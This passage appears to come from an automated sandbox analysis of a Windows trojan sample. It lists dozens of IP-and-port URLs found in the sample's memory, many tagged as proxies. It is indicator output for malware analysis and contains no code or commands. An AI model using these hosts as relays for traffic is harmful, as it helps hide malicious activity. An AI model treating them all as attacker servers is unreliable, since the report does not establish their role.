                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6D8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.217.49:10820://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.218.79:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.218.79:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.64.91:1976
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.64.91:1976://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD140000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.65.120:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.65.120:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.65.125:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.255.65.125:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.51.214.182:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.79.243.103:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.79.243.103:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7670000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.103.9:6888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7687000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.80.103.9:6888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA6F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.87.78.137
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.87.78.137://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.87.78.137:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.10.252:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.99.148.60:8111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.229.56
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.229.56://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.116.229.56:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DAF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.134.157:3629
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.151.134.157:3629://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.161.70.115:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.161.70.115:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.117.30:5678
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.117.30:5678://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C659E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.168.121.175:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C659E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.168.121.175:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.188.110.196:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD0E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.188.110.196:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.237.34.17:37647
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.237.34.17:37647://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C804E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.237.35.129:51549
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.237.35.129:51549://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.248.204.178:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.249.65.191:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.249.65.191:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.28.32.203:57391
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.28.32.203:57391://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.36.114.38:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.43.10.141
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C661F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.43.10.141://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76EA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.154.124.211:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.154.124.211:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA3E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.74.184.32:999
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.74.184.32:999://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.84.17.133:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.84.17.133:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7860000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.123.189:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.123.189:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C849F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.203.75:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.107.203.75:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.108.130.111:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.108.130.111:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.88.53
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.88.53://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.88.53:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.89.41:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.89.41:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.89.41:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.121.89.41:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8483000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C843B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8454000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:11946://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:12217://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:16487
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:16487://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:27207
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:27207://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32588
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:32588://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:49042
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:49042://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:5401
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:5401://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:57320
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:57320://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:8879
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:8879://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:9141
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.140.160:9141://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.136.142.153:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.136.142.153:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C903D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.142.222.84:55718
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C903D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.142.222.84:55718://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.149.224.168:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.149.224.168:3128x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.149.224.3:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBFA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.149.224.3:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.189.122:30389
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.189.122:30389://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.189.122:60647
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC15B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.189.122:60647://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.67.17:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.67.17:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.77.58:56921
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C84EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.150.77.58:56921://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.236.24:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.185.236.24:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.186:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.186:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.188:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.189:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.189:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.190:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.177.190:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.237.78:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.189.237.78:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.197.77.118:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.197.77.118:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.93.32:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.199.93.32:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.200.114.58:55749
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C924A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.200.114.58:55749://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.200.115.49:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8E78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.200.115.49:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.202.230.219:8080://proxy
